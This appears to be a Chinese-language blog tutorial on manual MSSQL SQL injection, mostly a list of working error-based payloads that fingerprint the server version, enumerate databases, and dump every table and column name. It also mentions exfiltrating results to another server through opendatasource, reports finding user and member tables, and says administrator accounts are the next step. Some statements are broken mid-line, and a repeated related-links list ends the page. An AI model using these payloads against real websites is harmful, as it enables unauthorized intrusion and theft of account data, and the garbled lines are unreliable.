MSSQL注入反彈注入

明明是sql注入的點，卻無法進行注入，注射工具拆解的速度異常的緩慢，錯誤提示資訊關閉，無法返回注入的結果，這個時候你便可以嘗試使用**注入，

**注入需要依賴於函式opendatasource的支援，將當前資料庫中的查詢結果傳送到另一資料庫伺服器中。

and exists (select * from sysobjects)--返回正常為mssql（也名sql server）

and exists (select count(*) from sysobjects)--有時上面那個語句不行就試試這個哈

and 1=@@version--這個語句要在有回顯的模式下才可以哦

and substring((select @@version),22,4)='2008'--適用於無回顯模式，後面的2008就是資料庫版本，返回正常就是2008的複製**第一條語句執行效果圖（類似）：第二條語句執行效果圖：（如果是2008的話就返回正常）

1. and 1=(select quotename(count(name)) from master..sysdatabases)--

2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --

3. and 1=(select str(coun、 and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--

and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --

and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --

說明：dbid從1-4的資料庫一般為系統資料庫.

and 1=(select quotename(name) from master..sysdatabases for xml path(''))--

and 1=(select '|'%2bname%2b'|' from master..sysdatabases for xml path(''))--

and db_name()>0

and 1=(select db_name())--

【下列語句可一次爆資料庫所有表（只限於mssql2005及以上版本）】

and 1=(select quotename(name) from 資料庫名..sysobjects where xtype='u' for xml path(''))--

and 1=(select '|'%2bname%2b'|' from 資料庫名..sysobjects where xtype='u' for xml path(''))--複製**測試效果圖：得到 3個敏感的表：whir_sec_users/whir_mem_member/whir_mem_membergroup

一次爆指定表的所有列（只限於mssql2005及以上版本）：

and 1=(select quotename(name) from 資料庫名..syscolumns where id =(select id from 資料庫名..sysobjects where name='指定表名') for xml path(''))--

and 1=(select '|'%2bname%2b'|' from 資料庫名..syscolumns where id =(select id from 資料庫名..sysobjects where name='指定表名') for xml path(''))--

注意：在使用一次獲取資料庫資訊的語句時，請使用火狐瀏覽器，筆者測試 ie8、360急速瀏覽器、獵豹瀏覽器均卡死，火狐瀏覽器也會導致出現幾秒鐘的卡死，彈出框框，我們點選「停止指令碼」就會得到初步解決。！！！！！！！！！！！！！！！！！！！！至此，我們已經得到了賬戶資訊了，至於管理員的呢，哈哈，大家自行測試時換表啥的就好了。

MSSQL注入反彈注入

MSSQL注入顯錯注入及反彈注入

ms sql 注入安全

mssql手工注入

MSSQL注入 反彈注入

MSSQL注入 顯錯注入及反彈注入

ms sql 注入安全

mssql手工注入

相關推薦

MSSQL注入反彈注入

MSSQL注入顯錯注入及反彈注入